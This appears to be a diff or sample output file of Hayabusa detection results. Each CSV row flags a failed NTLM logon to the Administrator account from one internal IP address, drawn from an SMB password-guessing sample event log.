+2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
